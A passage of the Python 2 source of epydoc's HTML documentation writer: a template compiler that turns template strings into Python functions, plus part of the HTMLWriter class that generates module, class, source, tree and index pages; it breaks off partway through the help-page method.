# # epydoc -- HTML output generator # Edward Loper # # Created [01/30/01 05:18 PM] # $Id: html.py 1674 2008-01-29 06:03:36Z edloper $ # """ The HTML output generator for epydoc. The main interface provided by this module is the L{HTMLWriter} class. @todo: Add a cache to L{HTMLWriter.url()}? """ __docformat__ = 'epytext en' import re, os, sys, codecs, sre_constants, pprint, base64 import urllib import __builtin__ from epydoc.apidoc import * import epydoc.docstringparser import time, epydoc, epydoc.markup, epydoc.markup.epytext from epydoc.docwriter.html_colorize import PythonSourceColorizer from epydoc.docwriter import html_colorize from epydoc.docwriter.html_css import STYLESHEETS from epydoc.docwriter.html_help import HTML_HELP from epydoc.docwriter.dotgraph import * from epydoc import log from epydoc.util import plaintext_to_html, is_src_filename from epydoc.compat import * # Backwards compatibility ###################################################################### ## Template Compiler ###################################################################### # The compile_template() method defined in this section is used to # define several of HTMLWriter's methods. def compile_template(docstring, template_string, output_function='out', debug=epydoc.DEBUG): """ Given a template string containing inline python source code, return a python function that will fill in the template, and output the result. The signature for this function is taken from the first line of C{docstring}. Output is generated by making repeated calls to the output function with the given name (which is typically one of the function's parameters). The templating language used by this function passes through all text as-is, with three exceptions: - If every line in the template string is indented by at least M{x} spaces, then the first M{x} spaces are stripped from each line. 
- Any line that begins with '>>>' (with no indentation) should contain python code, and will be inserted as-is into the template-filling function. If the line begins a control block (such as 'if' or 'for'), then the control block will be closed by the first '>>>'-marked line whose indentation is less than or equal to the line's own indentation (including lines that only contain comments.) - In any other line, any expression between two '$' signs will be evaluated and inserted into the line (using C{str()} to convert the result to a string). Here is a simple example: >>> TEMPLATE = ''' ... <book> ... <title>$book.title$</title> ... <pages>$book.count_pages()$</pages> ... >>> for chapter in book.chapters: ... <chaptername>$chapter.name$</chaptername> ... >>> #endfor ... </book> >>> write_book = compile_template('write_book(out, book)', TEMPLATE) @newfield acknowledgements: Acknowledgements @acknowledgements: The syntax used by C{compile_template} is loosely based on Cheetah. """ # Extract signature from the docstring: signature = docstring.lstrip().split('\n',1)[0].strip() func_name = signature.split('(',1)[0].strip() # Regexp to search for inline substitutions: INLINE = re.compile(r'\$([^\$]+)\$') # Regexp to search for python statements in the template: COMMAND = re.compile(r'(^>>>.*)\n?', re.MULTILINE) # Strip indentation from the template. template_string = strip_indent(template_string) # If we're debugging, then we'll store the generated function, # so we can print it along with any tracebacks that depend on it. 
if debug: signature = re.sub(r'\)\s*$', ', __debug=__debug)', signature) # Funciton declaration line pysrc_lines = ['def %s:' % signature] indents = [-1] if debug: pysrc_lines.append(' try:') indents.append(-1) commands = COMMAND.split(template_string.strip()+'\n') for i, command in enumerate(commands): if command == '': continue # String literal segment: if i%2 == 0: pieces = INLINE.split(command) for j, piece in enumerate(pieces): if j%2 == 0: # String piece pysrc_lines.append(' '*len(indents)+ '%s(%r)' % (output_function, piece)) else: # Variable piece pysrc_lines.append(' '*len(indents)+ '%s(unicode(%s))' % (output_function, piece)) # Python command: else: srcline = command[3:].lstrip() # Update indentation indent = len(command)-len(srcline) while indent <= indents[-1]: indents.pop() # Add on the line. srcline = srcline.rstrip() pysrc_lines.append(' '*len(indents)+srcline) if srcline.endswith(':'): indents.append(indent) if debug: pysrc_lines.append(' except Exception,e:') pysrc_lines.append(' pysrc, func_name = __debug ') pysrc_lines.append(' lineno = sys.exc_info()[2].tb_lineno') pysrc_lines.append(' print ("Exception in template %s() on "') pysrc_lines.append(' "line %d:" % (func_name, lineno))') pysrc_lines.append(' print pysrc[lineno-1]') pysrc_lines.append(' raise') pysrc = '\n'.join(pysrc_lines)+'\n' #log.debug(pysrc) if debug: localdict = {'__debug': (pysrc_lines, func_name)} else: localdict = {} try: exec pysrc in globals(), localdict except SyntaxError: log.error('Error in script:\n' + pysrc + '\n') raise template_func = localdict[func_name] template_func.__doc__ = docstring return template_func def strip_indent(s): """ Given a multiline string C{s}, find the minimum indentation for all non-blank lines, and return a new string formed by stripping that amount of indentation from all lines in C{s}. """ # Strip indentation from the template. 
minindent = sys.maxint lines = s.split('\n') for line in lines: stripline = line.lstrip() if stripline: minindent = min(minindent, len(line)-len(stripline)) return '\n'.join([l[minindent:] for l in lines]) ###################################################################### ## HTML Writer ###################################################################### class HTMLWriter: #//////////////////////////////////////////////////////////// # Table of Contents #//////////////////////////////////////////////////////////// # # 1. Interface Methods # # 2. Page Generation -- write complete web page files # 2.1. Module Pages # 2.2. Class Pages # 2.3. Trees Page # 2.4. Indices Page # 2.5. Help Page # 2.6. Frames-based table of contents pages # 2.7. Homepage (index.html) # 2.8. CSS Stylesheet # 2.9. Javascript file # 2.10. Graphs # 2.11. Images # # 3. Page Element Generation -- write pieces of a web page file # 3.1. Page Header # 3.2. Page Footer # 3.3. Navigation Bar # 3.4. Breadcrumbs # 3.5. Summary Tables # # 4. Helper functions def __init__(self, docindex, **kwargs): """ Construct a new HTML writer, using the given documentation index. @param docindex: The documentation index. @type prj_name: C{string} @keyword prj_name: The name of the project. Defaults to none. @type prj_url: C{string} @keyword prj_url: The target for the project hopeage link on the navigation bar. If C{prj_url} is not specified, then no hyperlink is created. @type prj_link: C{string} @keyword prj_link: The label for the project link on the navigation bar. This link can contain arbitrary HTML code (e.g. images). By default, a label is constructed from C{prj_name}. @type top_page: C{string} @keyword top_page: The top page for the documentation. This is the default page shown main frame, when frames are enabled. C{top} can be a URL, the name of a module, the name of a class, or one of the special strings C{"trees.html"}, C{"indices.html"}, or C{"help.html"}. 
By default, the top-level package or module is used, if there is one; otherwise, C{"trees"} is used. @type css: C{string} @keyword css: The CSS stylesheet file. If C{css} is a file name, then the specified file's conents will be used. Otherwise, if C{css} is the name of a CSS stylesheet in L{epydoc.docwriter.html_css}, then that stylesheet will be used. Otherwise, an error is reported. If no stylesheet is specified, then the default stylesheet is used. @type help_file: C{string} @keyword help_file: The name of the help file. If no help file is specified, then the default help file will be used. @type show_private: C{boolean} @keyword show_private: Whether to create documentation for private objects. By default, private objects are documented. @type show_frames: C{boolean}) @keyword show_frames: Whether to create a frames-based table of contents. By default, it is produced. @type show_imports: C{boolean} @keyword show_imports: Whether or not to display lists of imported functions and classes. By default, they are not shown. @type variable_maxlines: C{int} @keyword variable_maxlines: The maximum number of lines that should be displayed for the value of a variable in the variable details section. By default, 8 lines are displayed. @type variable_linelength: C{int} @keyword variable_linelength: The maximum line length used for displaying the values of variables in the variable details sections. If a line is longer than this length, then it will be wrapped to the next line. The default line length is 70 characters. @type variable_summary_linelength: C{int} @keyword variable_summary_linelength: The maximum line length used for displaying the values of variables in the summary section. If a line is longer than this length, then it will be truncated. The default is 40 characters. @type variable_tooltip_linelength: C{int} @keyword variable_tooltip_linelength: The maximum line length used for tooltips for the values of variables. 
If a line is longer than this length, then it will be truncated. The default is 600 characters. @type property_function_linelength: C{int} @keyword property_function_linelength: The maximum line length used to dispaly property functions (C{fget}, C{fset}, and C{fdel}) that contain something other than a function object. The default length is 40 characters. @type inheritance: C{string} @keyword inheritance: How inherited objects should be displayed. If C{inheritance='grouped'}, then inherited objects are gathered into groups; if C{inheritance='listed'}, then inherited objects are listed in a short list at the end of their group; if C{inheritance='included'}, then inherited objects are mixed in with non-inherited objects. The default is 'grouped'. @type include_source_code: C{boolean} @keyword include_source_code: If true, then generate colorized source code files for each python module. @type include_log: C{boolean} @keyword include_log: If true, the the footer will include an href to the page 'epydoc-log.html'. @type src_code_tab_width: C{int} @keyword src_code_tab_width: Number of spaces to replace each tab with in source code listings. """ self.docindex = docindex # Process keyword arguments. 
self._show_private = kwargs.get('show_private', 1) """Should private docs be included?""" self._prj_name = kwargs.get('prj_name', None) """The project's name (for the project link in the navbar)""" self._prj_url = kwargs.get('prj_url', None) """URL for the project link in the navbar""" self._prj_link = kwargs.get('prj_link', None) """HTML code for the project link in the navbar""" self._top_page = kwargs.get('top_page', None) """The 'main' page""" self._css = kwargs.get('css') """CSS stylesheet to use""" self._helpfile = kwargs.get('help_file', None) """Filename of file to extract help contents from""" self._frames_index = kwargs.get('show_frames', 1) """Should a frames index be created?""" self._show_imports = kwargs.get('show_imports', False) """Should imports be listed?""" self._propfunc_linelen = kwargs.get('property_function_linelength', 40) """[XXX] Not used!""" self._variable_maxlines = kwargs.get('variable_maxlines', 8) """Max lines for variable values""" self._variable_linelen = kwargs.get('variable_linelength', 70) """Max line length for variable values""" self._variable_summary_linelen = \ kwargs.get('variable_summary_linelength', 65) """Max length for variable value summaries""" self._variable_tooltip_linelen = \ kwargs.get('variable_tooltip_linelength', 600) """Max length for variable tooltips""" self._inheritance = kwargs.get('inheritance', 'listed') """How should inheritance be displayed? 
'listed', 'included', or 'grouped'""" self._incl_sourcecode = kwargs.get('include_source_code', True) """Should pages be generated for source code of modules?""" self._mark_docstrings = kwargs.get('mark_docstrings', False) """Wrap <span class='docstring'>...</span> around docstrings?""" self._graph_types = kwargs.get('graphs', ()) or () """Graphs that we should include in our output.""" self._include_log = kwargs.get('include_log', False) """Are we generating an HTML log page?""" self._src_code_tab_width = kwargs.get('src_code_tab_width', 8) """Number of spaces to replace each tab with in source code listings.""" self._callgraph_cache = {} """Map the callgraph L{uid<DotGraph.uid>} to their HTML representation.""" self._redundant_details = kwargs.get('redundant_details', False) """If true, then include objects in the details list even if all info about them is already provided by the summary table.""" # For use with select_variables(): if self._show_private: self._public_filter = None else: self._public_filter = True # Make sure inheritance has a sane value. if self._inheritance not in ('listed', 'included', 'grouped'): raise ValueError, 'Bad value for inheritance' # Create the project homepage link, if it was not specified. if (self._prj_name or self._prj_url) and not self._prj_link: self._prj_link = plaintext_to_html(self._prj_name or 'Project Homepage') # Add a hyperlink to _prj_url, if _prj_link doesn't already # contain any hyperlinks. if (self._prj_link and self._prj_url and not re.search(r'<a[^>]*\shref', self._prj_link)): self._prj_link = ('<a class="navbar" target="_top" href="'+ self._prj_url+'">'+self._prj_link+'</a>') # Precompute lists & sets of APIDoc objects that we're # interested in. 
self.valdocs = valdocs = sorted(docindex.reachable_valdocs( imports=False, packages=False, bases=False, submodules=False, subclasses=False, private=self._show_private)) self.module_list = [d for d in valdocs if isinstance(d, ModuleDoc)] """The list of L{ModuleDoc}s for the documented modules.""" self.module_set = set(self.module_list) """The set of L{ModuleDoc}s for the documented modules.""" self.class_list = [d for d in valdocs if isinstance(d, ClassDoc)] """The list of L{ClassDoc}s for the documented classes.""" self.class_set = set(self.class_list) """The set of L{ClassDoc}s for the documented classes.""" self.routine_list = [d for d in valdocs if isinstance(d, RoutineDoc)] """The list of L{RoutineDoc}s for the documented routines.""" self.indexed_docs = [] """The list of L{APIDoc}s for variables and values that should be included in the index.""" # URL for 'trees' page if self.module_list: self._trees_url = 'module-tree.html' else: self._trees_url = 'class-tree.html' # Construct the value for self.indexed_docs. self.indexed_docs += [d for d in valdocs if not isinstance(d, GenericValueDoc)] for doc in valdocs: if isinstance(doc, NamespaceDoc): # add any vars with generic values; but don't include # inherited vars. self.indexed_docs += [d for d in doc.variables.values() if isinstance(d.value, GenericValueDoc) and d.container == doc] self.indexed_docs.sort() # Figure out the url for the top page. self._top_page_url = self._find_top_page(self._top_page) # Decide whether or not to split the identifier index. self._split_ident_index = (len(self.indexed_docs) >= self.SPLIT_IDENT_INDEX_SIZE) # Figure out how many output files there will be (for progress # reporting). 
self.modules_with_sourcecode = set() for doc in self.module_list: if isinstance(doc, ModuleDoc) and is_src_filename(doc.filename): self.modules_with_sourcecode.add(doc) self._num_files = (len(self.class_list) + len(self.module_list) + 10 + len(self.METADATA_INDICES)) if self._frames_index: self._num_files += len(self.module_list) + 3 if self._incl_sourcecode: self._num_files += len(self.modules_with_sourcecode) if self._split_ident_index: self._num_files += len(self.LETTERS) def _find_top_page(self, pagename): """ Find the top page for the API documentation. This page is used as the default page shown in the main frame, when frames are used. When frames are not used, this page is copied to C{index.html}. @param pagename: The name of the page, as specified by the keyword argument C{top} to the constructor. @type pagename: C{string} @return: The URL of the top page. @rtype: C{string} """ # If a page name was specified, then we need to figure out # what it points to. if pagename: # If it's a URL, then use it directly. if pagename.lower().startswith('http:'): return pagename # If it's an object, then use that object's page. try: doc = self.docindex.get_valdoc(pagename) return self.url(doc) except: pass # Otherwise, give up. log.warning('Could not find top page %r; using %s ' 'instead' % (pagename, self._trees_url)) return self._trees_url # If no page name was specified, then try to choose one # automatically. else: root = [val_doc for val_doc in self.docindex.root if isinstance(val_doc, (ClassDoc, ModuleDoc))] if len(root) == 0: # No docs?? Try the trees page. return self._trees_url elif len(root) == 1: # One item in the root; use that. return self.url(root[0]) else: # Multiple root items; if they're all in one package, # then use that. 
Otherwise, use self._trees_url root = sorted(root, key=lambda v:len(v.canonical_name)) top = root[0] for doc in root[1:]: if not top.canonical_name.dominates(doc.canonical_name): return self._trees_url else: return self.url(top) #//////////////////////////////////////////////////////////// #{ 1. Interface Methods #//////////////////////////////////////////////////////////// def write(self, directory=None): """ Write the documentation to the given directory. @type directory: C{string} @param directory: The directory to which output should be written. If no directory is specified, output will be written to the current directory. If the directory does not exist, it will be created. @rtype: C{None} @raise OSError: If C{directory} cannot be created. @raise OSError: If any file cannot be created or written to. """ # For progress reporting: self._files_written = 0. # Set the default values for ValueDoc formatted representations. orig_valdoc_defaults = (ValueDoc.SUMMARY_REPR_LINELEN, ValueDoc.REPR_LINELEN, ValueDoc.REPR_MAXLINES) ValueDoc.SUMMARY_REPR_LINELEN = self._variable_summary_linelen ValueDoc.REPR_LINELEN = self._variable_linelen ValueDoc.REPR_MAXLINES = self._variable_maxlines # Use an image for the crarr symbol. from epydoc.markup.epytext import ParsedEpytextDocstring orig_crarr_html = ParsedEpytextDocstring.SYMBOL_TO_HTML['crarr'] ParsedEpytextDocstring.SYMBOL_TO_HTML['crarr'] = ( r'<span class="variable-linewrap">' r'<img src="crarr.png" alt="\" /></span>') # Keep track of failed xrefs, and report them at the end. self._failed_xrefs = {} # Create destination directories, if necessary if not directory: directory = os.curdir self._mkdir(directory) self._directory = directory # Write the CSS file. self._files_written += 1 log.progress(self._files_written/self._num_files, 'epydoc.css') self.write_css(directory, self._css) # Write the Javascript file. 
self._files_written += 1 log.progress(self._files_written/self._num_files, 'epydoc.js') self.write_javascript(directory) # Write images self.write_images(directory) # Build the indices. indices = {'ident': self.build_identifier_index(), 'term': self.build_term_index()} for (name, label, label2) in self.METADATA_INDICES: indices[name] = self.build_metadata_index(name) # Write the identifier index. If requested, split it into # separate pages for each letter. ident_by_letter = self._group_by_letter(indices['ident']) if not self._split_ident_index: self._write(self.write_link_index, directory, 'identifier-index.html', indices, 'Identifier Index', 'identifier-index.html', ident_by_letter) else: # Write a page for each section. for letter in self.LETTERS: filename = 'identifier-index-%s.html' % letter self._write(self.write_link_index, directory, filename, indices, 'Identifier Index', filename, ident_by_letter, [letter], 'identifier-index-%s.html') # Use the first non-empty section as the main index page. for letter in self.LETTERS: if letter in ident_by_letter: filename = 'identifier-index.html' self._write(self.write_link_index, directory, filename, indices, 'Identifier Index', filename, ident_by_letter, [letter], 'identifier-index-%s.html') break # Write the term index. if indices['term']: term_by_letter = self._group_by_letter(indices['term']) self._write(self.write_link_index, directory, 'term-index.html', indices, 'Term Definition Index', 'term-index.html', term_by_letter) else: self._files_written += 1 # (skipped) # Write the metadata indices. 
for (name, label, label2) in self.METADATA_INDICES: if indices[name]: self._write(self.write_metadata_index, directory, '%s-index.html' % name, indices, name, label, label2) else: self._files_written += 1 # (skipped) # Write the trees file (package & class hierarchies) if self.module_list: self._write(self.write_module_tree, directory, 'module-tree.html') else: self._files_written += 1 # (skipped) if self.class_list: self._write(self.write_class_tree, directory, 'class-tree.html') else: self._files_written += 1 # (skipped) # Write the help file. self._write(self.write_help, directory,'help.html') # Write the frames-based table of contents. if self._frames_index: self._write(self.write_frames_index, directory, 'frames.html') self._write(self.write_toc, directory, 'toc.html') self._write(self.write_project_toc, directory, 'toc-everything.html') for doc in self.module_list: filename = 'toc-%s' % urllib.unquote(self.url(doc)) self._write(self.write_module_toc, directory, filename, doc) # Write the object documentation. for doc in self.module_list: filename = urllib.unquote(self.url(doc)) self._write(self.write_module, directory, filename, doc) for doc in self.class_list: filename = urllib.unquote(self.url(doc)) self._write(self.write_class, directory, filename, doc) # Write source code files. if self._incl_sourcecode: # Build a map from short names to APIDocs, used when # linking names in the source code. name_to_docs = {} for api_doc in self.indexed_docs: if (api_doc.canonical_name is not None and self.url(api_doc) is not None): name = api_doc.canonical_name[-1] name_to_docs.setdefault(name, []).append(api_doc) # Sort each entry of the name_to_docs list. for doc_list in name_to_docs.values(): doc_list.sort() # Write the source code for each module. for doc in self.modules_with_sourcecode: filename = urllib.unquote(self.pysrc_url(doc)) self._write(self.write_sourcecode, directory, filename, doc, name_to_docs) # Write the auto-redirect page. 
self._write(self.write_redirect_page, directory, 'redirect.html') # Write the mapping object name -> URL self._write(self.write_api_list, directory, 'api-objects.txt') # Write the index.html files. # (this must be done last, since it might copy another file) self._files_written += 1 log.progress(self._files_written/self._num_files, 'index.html') self.write_homepage(directory) # Don't report references to builtins as missing for k in self._failed_xrefs.keys(): # have a copy of keys if hasattr(__builtin__, k): del self._failed_xrefs[k] # Report any failed crossreferences if self._failed_xrefs: estr = 'Failed identifier crossreference targets:\n' failed_identifiers = self._failed_xrefs.keys() failed_identifiers.sort() for identifier in failed_identifiers: names = self._failed_xrefs[identifier].keys() names.sort() estr += '- %s' % identifier estr += '\n' for name in names: estr += ' (from %s)\n' % name log.docstring_warning(estr) # [xx] testing: if self._num_files != int(self._files_written): log.debug("Expected to write %d files, but actually " "wrote %d files" % (self._num_files, int(self._files_written))) # Restore defaults that we changed. (ValueDoc.SUMMARY_REPR_LINELEN, ValueDoc.REPR_LINELEN, ValueDoc.REPR_MAXLINES) = orig_valdoc_defaults ParsedEpytextDocstring.SYMBOL_TO_HTML['crarr'] = orig_crarr_html def _write(self, write_func, directory, filename, *args): # Display our progress. self._files_written += 1 log.progress(self._files_written/self._num_files, filename) path = os.path.join(directory, filename) f = codecs.open(path, 'w', 'ascii', errors='xmlcharrefreplace') write_func(f.write, *args) f.close() def _mkdir(self, directory): """ If the given directory does not exist, then attempt to create it. @rtype: C{None} """ if not os.path.isdir(directory): if os.path.exists(directory): raise OSError('%r is not a directory' % directory) os.mkdir(directory) #//////////////////////////////////////////////////////////// #{ 2.1. 
Module Pages #//////////////////////////////////////////////////////////// def write_module(self, out, doc): """ Write an HTML page containing the API documentation for the given module to C{out}. @param doc: A L{ModuleDoc} containing the API documentation for the module that should be described. """ longname = doc.canonical_name shortname = doc.canonical_name[-1] # Write the page header (incl. navigation bar & breadcrumbs) self.write_header(out, str(longname)) self.write_navbar(out, doc) self.write_breadcrumbs(out, doc, self.url(doc)) # Write the name of the module we're describing. if doc.is_package is True: typ = 'Package' else: typ = 'Module' if longname[0].startswith('script-'): shortname = str(longname)[7:] typ = 'Script' out('<!-- ==================== %s ' % typ.upper() + 'DESCRIPTION ==================== -->\n') out('<h1 class="epydoc">%s %s</h1>' % (typ, shortname)) out('<p class="nomargin-top">%s</p>\n' % self.pysrc_link(doc)) # If the module has a description, then list it. if doc.descr not in (None, UNKNOWN): out(self.descr(doc, 2)+'\n\n') # Write any standarad metadata (todo, author, etc.) if doc.metadata is not UNKNOWN and doc.metadata: out('<hr />\n') self.write_standard_fields(out, doc) # If it's a package, then list the modules it contains. if doc.is_package is True: self.write_module_list(out, doc) # Write summary tables describing the variables that the # module defines. self.write_summary_table(out, "Classes", doc, "class") self.write_summary_table(out, "Functions", doc, "function") self.write_summary_table(out, "Variables", doc, "other") # Write a list of all imported objects. if self._show_imports: self.write_imports(out, doc) # Write detailed descriptions of functions & variables defined # in this module. 
self.write_details_list(out, "Function Details", doc, "function") self.write_details_list(out, "Variables Details", doc, "other") # Write the page footer (including navigation bar) self.write_navbar(out, doc) self.write_footer(out) #//////////////////////////////////////////////////////////// #{ 2.??. Source Code Pages #//////////////////////////////////////////////////////////// def write_sourcecode(self, out, doc, name_to_docs): #t0 = time.time() filename = doc.filename name = str(doc.canonical_name) # Header self.write_header(out, name) self.write_navbar(out, doc) self.write_breadcrumbs(out, doc, self.pysrc_url(doc)) # Source code listing out('<h1 class="epydoc">Source Code for %s</h1>\n' % self.href(doc, label='%s %s' % (self.doc_kind(doc), name))) out('<pre class="py-src">\n') out(PythonSourceColorizer(filename, name, self.docindex, self.url, name_to_docs, self._src_code_tab_width).colorize()) out('</pre>\n<br />\n') # Footer self.write_navbar(out, doc) self.write_footer(out) #log.debug('[%6.2f sec] Wrote pysrc for %s' % # (time.time()-t0, name)) #//////////////////////////////////////////////////////////// #{ 2.2. Class Pages #//////////////////////////////////////////////////////////// def write_class(self, out, doc): """ Write an HTML page containing the API documentation for the given class to C{out}. @param doc: A L{ClassDoc} containing the API documentation for the class that should be described. """ longname = doc.canonical_name shortname = doc.canonical_name[-1] # Write the page header (incl. navigation bar & breadcrumbs) self.write_header(out, str(longname)) self.write_navbar(out, doc) self.write_breadcrumbs(out, doc, self.url(doc)) # Write the name of the class we're describing. 
if doc.is_type(): typ = 'Type' elif doc.is_exception(): typ = 'Exception' else: typ = 'Class' out('<!-- ==================== %s ' % typ.upper() + 'DESCRIPTION ==================== -->\n') out('<h1 class="epydoc">%s %s</h1>' % (typ, shortname)) out('<p class="nomargin-top">%s</p>\n' % self.pysrc_link(doc)) if ((doc.bases not in (UNKNOWN, None) and len(doc.bases) > 0) or (doc.subclasses not in (UNKNOWN,None) and len(doc.subclasses)>0)): # Display bases graphically, if requested. if 'umlclasstree' in self._graph_types: self.write_class_tree_graph(out, doc, uml_class_tree_graph) elif 'classtree' in self._graph_types: self.write_class_tree_graph(out, doc, class_tree_graph) # Otherwise, use ascii-art. else: # Write the base class tree. if doc.bases not in (UNKNOWN, None) and len(doc.bases) > 0: out('<pre class="base-tree">\n%s</pre>\n\n' % self.base_tree(doc)) # Write the known subclasses if (doc.subclasses not in (UNKNOWN, None) and len(doc.subclasses) > 0): out('<dl><dt>Known Subclasses:</dt>\n<dd>\n ') out(' <ul class="subclass-list">\n') for i, subclass in enumerate(doc.subclasses): href = self.href(subclass, context=doc) if self._val_is_public(subclass): css = '' else: css = ' class="private"' if i > 0: href = ', '+href out('<li%s>%s</li>' % (css, href)) out(' </ul>\n') out('</dd></dl>\n\n') out('<hr />\n') # If the class has a description, then list it. if doc.descr not in (None, UNKNOWN): out(self.descr(doc, 2)+'\n\n') # Write any standarad metadata (todo, author, etc.) if doc.metadata is not UNKNOWN and doc.metadata: out('<hr />\n') self.write_standard_fields(out, doc) # Write summary tables describing the variables that the # class defines. 
self.write_summary_table(out, "Nested Classes", doc, "class") self.write_summary_table(out, "Instance Methods", doc, "instancemethod") self.write_summary_table(out, "Class Methods", doc, "classmethod") self.write_summary_table(out, "Static Methods", doc, "staticmethod") self.write_summary_table(out, "Class Variables", doc, "classvariable") self.write_summary_table(out, "Instance Variables", doc, "instancevariable") self.write_summary_table(out, "Properties", doc, "property") # Write a list of all imported objects. if self._show_imports: self.write_imports(out, doc) # Write detailed descriptions of functions & variables defined # in this class. # [xx] why group methods into one section but split vars into two? # seems like we should either group in both cases or split in both # cases. self.write_details_list(out, "Method Details", doc, "method") self.write_details_list(out, "Class Variable Details", doc, "classvariable") self.write_details_list(out, "Instance Variable Details", doc, "instancevariable") self.write_details_list(out, "Property Details", doc, "property") # Write the page footer (including navigation bar) self.write_navbar(out, doc) self.write_footer(out) def write_class_tree_graph(self, out, doc, graphmaker): """ Write HTML code for a class tree graph of C{doc} (a classdoc), using C{graphmaker} to draw the actual graph. C{graphmaker} should be L{class_tree_graph()}, or L{uml_class_tree_graph()}, or any other function with a compatible signature. If the given class has any private sublcasses (including recursive subclasses), then two graph images will be generated -- one to display when private values are shown, and the other to display when private values are hidden. 
""" linker = _HTMLDocstringLinker(self, doc) private_subcls = self._private_subclasses(doc) if private_subcls: out('<center>\n' ' <div class="private">%s</div>\n' ' <div class="public" style="display:none">%s</div>\n' '</center>\n' % (self.render_graph(graphmaker(doc, linker, doc)), self.render_graph(graphmaker(doc, linker, doc, exclude=private_subcls)))) else: out('<center>\n%s\n</center>\n' % self.render_graph(graphmaker(doc, linker, doc))) #//////////////////////////////////////////////////////////// #{ 2.3. Trees pages #//////////////////////////////////////////////////////////// def write_module_tree(self, out): # Header material self.write_treepage_header(out, 'Module Hierarchy', 'module-tree.html') out('<h1 class="epydoc">Module Hierarchy</h1>\n') # Write entries for all top-level modules/packages. out('<ul class="nomargin-top">\n') for doc in self.module_list: if (doc.package in (None, UNKNOWN) or doc.package not in self.module_set): self.write_module_tree_item(out, doc) out('</ul>\n') # Footer material self.write_navbar(out, 'trees') self.write_footer(out) def write_class_tree(self, out): """ Write HTML code for a nested list showing the base/subclass relationships between all documented classes. Each element of the top-level list is a class with no (documented) bases; and under each class is listed all of its subclasses. Note that in the case of multiple inheritance, a class may appear multiple times. @todo: For multiple inheritance, don't repeat subclasses the second time a class is mentioned; instead, link to the first mention. """ # [XX] backref for multiple inheritance? # Header material self.write_treepage_header(out, 'Class Hierarchy', 'class-tree.html') out('<h1 class="epydoc">Class Hierarchy</h1>\n') # Build a set containing all classes that we should list. # This includes everything in class_list, plus any of those # class' bases, but not undocumented subclasses. 
class_set = self.class_set.copy() for doc in self.class_list: if doc.bases != UNKNOWN: for base in doc.bases: if base not in class_set: if isinstance(base, ClassDoc): class_set.update(base.mro()) else: # [XX] need to deal with this -- how? pass #class_set.add(base) out('<ul class="nomargin-top">\n') for doc in sorted(class_set, key=lambda c:c.canonical_name[-1]): if doc.bases != UNKNOWN and len(doc.bases)==0: self.write_class_tree_item(out, doc, class_set) out('</ul>\n') # Footer material self.write_navbar(out, 'trees') self.write_footer(out) def write_treepage_header(self, out, title, url): # Header material. self.write_header(out, title) self.write_navbar(out, 'trees') self.write_breadcrumbs(out, 'trees', url) if self.class_list and self.module_list: out('<center><b>\n') out(' [ <a href="module-tree.html">Module Hierarchy</a>\n') out(' | <a href="class-tree.html">Class Hierarchy</a> ]\n') out('</b></center><br />\n') #//////////////////////////////////////////////////////////// #{ 2.4. Index pages #//////////////////////////////////////////////////////////// SPLIT_IDENT_INDEX_SIZE = 3000 """If the identifier index has more than this number of entries, then it will be split into separate pages, one for each alphabetical section.""" LETTERS = 'ABCDEFGHIJKLMNOPQRSTUVWXYZ_' """The alphabetical sections that are used for link index pages.""" def write_link_index(self, out, indices, title, url, index_by_section, sections=LETTERS, section_url='#%s'): # Header self.write_indexpage_header(out, indices, title, url) # Index title & links to alphabetical sections. out('<table border="0" width="100%">\n' '<tr valign="bottom"><td>\n') out('<h1 class="epydoc">%s</h1>\n</td><td>\n[\n' % title) for sec in self.LETTERS: if sec in index_by_section: out(' <a href="%s">%s</a>\n' % (section_url % sec, sec)) else: out(' %s\n' % sec) out(']\n') out('</td></table>\n') # Alphabetical sections. 
sections = [s for s in sections if s in index_by_section] if sections: out('<table border="0" width="100%">\n') for section in sorted(sections): out('<tr valign="top"><td valign="top" width="1%">') out('<h2 class="epydoc"><a name="%s">%s</a></h2></td>\n' % (section, section)) out('<td valign="top">\n') self.write_index_section(out, index_by_section[section], True) out('</td></tr>\n') out('</table>\n<br />') # Footer material. out('<br />') self.write_navbar(out, 'indices') self.write_footer(out) def write_metadata_index(self, out, indices, field, title, typ): """ Write an HTML page containing a metadata index. """ index = indices[field] # Header material. self.write_indexpage_header(out, indices, title, '%s-index.html' % field) # Page title. out('<h1 class="epydoc"><a name="%s">%s</a></h1>\n<br />\n' % (field, title)) # Index (one section per arg) for arg in sorted(index): # Write a section title. if arg is not None: if len([1 for (doc, descrs) in index[arg] if not self._doc_or_ancestor_is_private(doc)]) == 0: out('<div class="private">') else: out('<div>') self.write_table_header(out, 'metadata-index', arg) out('</table>') # List every descr for this arg. for (doc, descrs) in index[arg]: if self._doc_or_ancestor_is_private(doc): out('<div class="private">\n') else: out('<div>\n') out('<table width="100%" class="metadata-index" ' 'bgcolor="#e0e0e0"><tr><td class="metadata-index">') out('<b>%s in %s</b>' % (typ, self.href(doc, label=doc.canonical_name))) out(' <ul class="nomargin">\n') for descr in descrs: out(' <li>%s</li>\n' % self.docstring_to_html(descr,doc,4)) out(' </ul>\n') out('</table></div>\n') # Footer material. out('<br />') self.write_navbar(out, 'indices') self.write_footer(out) def write_indexpage_header(self, out, indices, title, url): """ A helper for the index page generation functions, which generates a header that can be used to navigate between the different indices. 
""" self.write_header(out, title) self.write_navbar(out, 'indices') self.write_breadcrumbs(out, 'indices', url) if (indices['term'] or [1 for (name,l,l2) in self.METADATA_INDICES if indices[name]]): out('<center><b>[\n') out(' <a href="identifier-index.html">Identifiers</a>\n') if indices['term']: out('| <a href="term-index.html">Term Definitions</a>\n') for (name, label, label2) in self.METADATA_INDICES: if indices[name]: out('| <a href="%s-index.html">%s</a>\n' % (name, label2)) out(']</b></center><br />\n') def write_index_section(self, out, items, add_blankline=False): out('<table class="link-index" width="100%" border="1">\n') num_rows = (len(items)+2)/3 for row in range(num_rows): out('<tr>\n') for col in range(3): out('<td width="33%" class="link-index">') i = col*num_rows+row if i < len(items): name, url, container = items[col*num_rows+row] out('<a href="%s">%s</a>' % (url, name)) if container is not None: out('<br />\n') if isinstance(container, ModuleDoc): label = container.canonical_name else: label = container.canonical_name[-1] out('<span class="index-where">(in&nbsp;%s)' '</span>' % self.href(container, label)) else: out('&nbsp;') out('</td>\n') out('</tr>\n') if add_blankline and num_rows == 1: blank_cell = '<td class="link-index">&nbsp;</td>' out('<tr>'+3*blank_cell+'</tr>\n') out('</table>\n') #//////////////////////////////////////////////////////////// #{ 2.5. Help Page #//////////////////////////////////////////////////////////// def write_help(self, out): """ Write an HTML help file to the given stream. If C{self._helpfile} contains a help file, then use it; otherwise, use the default helpfile from L{epydoc.docwriter.html_help}. """ # todo: optionally parse .rst etc help files? # Get the contents of the help 